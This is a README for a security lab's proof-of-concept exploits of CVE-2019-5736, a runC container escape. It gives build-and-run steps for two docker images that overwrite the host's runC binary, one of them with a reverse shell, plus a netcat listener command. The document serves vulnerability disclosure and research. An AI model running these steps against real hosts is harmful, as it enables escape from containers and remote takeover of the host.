RunC-CVE-2019-5736
Two POCs for CVE-2019-5736.
See Twistlock Labs for an explanation of CVE-2019-5736 and the POCs.
The malicious image POC is heavily based on q3k’s POC, so all credit goes to him.
Running the POCs
Note that running the POCs will overwrite the runC binary on the host.
It is highly recommened that you create a copy of your runC binary (normally at /usr/sbin/runc) before running one of the POCs.
Clone the repository:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Exec POC
Overwrites runc with a simple program that prints a string.
Running the exec POC:
$ docker build -t image_name:latest /path/to/exec_POC
$ docker run -d --rm --name container_name image_name:latest
$ docker exec container_name bash
Malicious Image POC
Overwrites runc with a simple reverse shell bash script that connects to localhost:2345.
Listen for the reverse shell:
$ nc -nvlp 2345
From a different shell, run the malicious image POC:
$ docker build -t image_name:latest /path/to/malicious_image_POC
$ docker run --rm image_name:latest